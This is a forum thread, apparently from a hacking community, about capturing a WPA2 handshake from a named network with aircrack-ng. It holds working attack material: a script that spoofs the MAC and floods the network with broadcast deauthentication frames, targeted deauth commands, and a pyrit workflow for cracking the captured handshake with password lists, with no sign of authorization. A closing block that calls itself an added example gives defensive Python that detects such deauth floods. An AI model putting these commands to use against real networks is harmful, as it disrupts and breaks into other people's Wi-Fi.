
Can't capture WPA handshake


GarrettVD

I'm trying to capture a 4-way WPA handshake using the Aircrack-ng suite of tools, in order to capture a 4-way WPA handshake.

The first issue was that, despite being in very close proximity, I was unable to see any clients in the terminal or .csv logs while running airodump-ng targeting a specific bssid on channel 1 + sending a few mass (i.e. not targeted to a specific client MAC) deauths every 15 seconds. No clients in the .CSV logs, yet I was able to see lots of probe responses from clients on the network, and beacons etc. (See screenshot #1)

So I then tried to target a specific device MAC address on the network. (Screenshot #2) The device appeared in the CSV log under Station MACs. But still, no WPA handshakes. Weird. So I checked the logs, and I can see that there is communication to the AP from the client, and vice-versa, but no handshakes. Hmmm.


BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
6C:19:8F:E5:G5:1E, 2015-10-10 00:37:36, 2015-10-10 00:40:09, 1, 54, WPA2, CCMP TKIP,PSK, -54, 1106, 96, 0. 0. 0. 0, 6, KingEagle,


Using the


#!/bin/bash
airmon-ng stop wlan1mon; \
ifconfig wlan1 down; \
ifconfig wlan0 down; \
macchanger -r wlan1; \
ifconfig wlan1 up; \
airmon-ng start wlan1 1; \
airodump-ng -c 1 --bssid 6C:19:8F:E5:G5:1E --showack --write /usb/airdump-log wlan1mon </dev/null &>/dev/null & \
while sleep 15; do aireplay-ng -0 5 -a 6C:19:8F:E5:G5:1E wlan1mon --ignore-negative-one; done


I'm attaching a screenshot of the probe responses and deauthentication packets.

Any help would be great!

Thanks,

Screenshot #1 - Mass Deauthentication


Screenshot #2 - Targeting HonHai___


Edited by GarrettVD

ifconfig wlan1 down

macchanger -r wlan1

iwconfig wlan1 mode monitor

ifconfig wlan1 up

airodump-ng -c 10 -w /path/to/Capture/output/NETGEAR --bssid 00:11:22:33:44:55 wlan1

# deauth client MAC 5x
aireplay-ng -0 5 -e NETGEAR -c 00:11:22:33:44:55 wlan1

Edited by hairbag

haven't played with wireshark enough to comment on it but above is what i've used and it always works. not sure about your script as i just do it manually in two terminal windows. one for capture and one for deauth.

after capture, analyze with pyrit if you are set up for gpu processing

# analyze

pyrit -r /path/to/capture/files/SSID-01.cap analyze

# strip and clean cap file

pyrit -r /path/to/capture/files/SSID-01.cap -o /path/to/capture/files/SSID-01.cap.gz strip

# passthrough attack

pyrit -r /path/to/capture/files/SSID-01.cap.gz -i /path/to/password/files/superWPA.lzma -b 11:22:33:44:55:66 attack_passthrough

or database

# import passwords

pyrit -i /path/to/password/files/superWPA.lzma import_unique_passwords

# add ssid to database

pyrit -e SSID create_essid

# batch process rainbows
pyrit batch

# attack cap file

pyrit -r /path/to/capture/files/SSID-01.cap.gz attack_db --all-handshakes

# delete ssid from db

pyrit -e SSID delete_essid

Edited by hairbag

open up two terminals and if you aren't seeing clients and the ssid in the airodump window you won't get handshakes, deauth won't work unless your nics support injection. i remember seeing something somewhere about non-patched drivers and having to use --ignore-negative-one to avoid errors.

what type of network adapters are you using? buy some alfas and you will do the dance of joy.

in your script you put wlan0 down after putting wlan1 in monitor mode...try on wlan0

try

airodump-ng wlan0 --manufacturer --wps

if you don't get a big list of all your neighbors' wifi then your nic is the issue.
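
Added example, not part of the thread: the repeated broadcast deauthentication bursts described in the first post, as they look from the monitoring side of the network. The frames, MAC addresses and thresholds (`burst_gap`, `min_frames`, `min_bursts`) are constructed assumptions, and the input is raw 802.11 frames without a radiotap header.

```python
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
# Constructed sample frames (raw 802.11, no radiotap header, no FCS); MACs are made up.
AP = "02aabbccdd01"
DEAUTH_BCAST = bytes.fromhex("c0000000" + "ffffffffffff" + AP + AP + "0000" + "0700")
DEAUTH_UNICAST = bytes.fromhex("c0000000" + "02aabbccdd99" + "02aabbccdd02" * 2 + "0000" + "0300")
BEACON_HDR = bytes.fromhex("80000000" + "ffffffffffff" + AP + AP + "0000" + "0000")

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a deauthentication frame, else None."""
    # Frame control byte 0: bits 0-1 version, 2-3 type, 4-7 subtype.
    if len(frame) < 26 or frame[0] != 0xC0:
        return None  # 0xC0 = version 0, management type, subtype 12 (deauthentication)
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def find_deauth_floods(capture, burst_gap=1.0, min_frames=3, min_bursts=2):
    """capture: iterable of (timestamp_s, raw_frame). Returns {bssid: [(burst_start, count), ...]}
    for BSSIDs that show repeated bursts of broadcast deauthentication frames."""
    seen = defaultdict(list)
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed and parsed[0] == BROADCAST:
            seen[parsed[2]].append(ts)
    alerts = {}
    for bssid, stamps in seen.items():
        bursts = []  # each entry: [first_ts, last_ts, count]
        for ts in sorted(stamps):
            if bursts and ts - bursts[-1][1] <= burst_gap:
                bursts[-1][1], bursts[-1][2] = ts, bursts[-1][2] + 1
            else:
                bursts.append([ts, ts, 1])
        big = [(b[0], b[2]) for b in bursts if b[2] >= min_frames]
        if len(big) >= min_bursts:  # a single burst can be legitimate; repetition is the signal
            alerts[bssid] = big
    return alerts

def sample_capture():
    """Constructed timeline: 5 broadcast deauths every 15 s, plus ordinary traffic."""
    cap = [(20.0, DEAUTH_UNICAST)]  # one unicast deauth from another AP, not a flood
    for start in (0.0, 15.0, 30.0):
        cap += [(start + i * 0.01, DEAUTH_BCAST) for i in range(5)]
        cap.append((start + 5.0, BEACON_HDR))
    return cap
```

Calling `find_deauth_floods(sample_capture())` reports the constructed AP with three bursts of five frames. Networks that require 802.11w (Protected Management Frames) have clients discard unauthenticated deauthentication frames like these.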
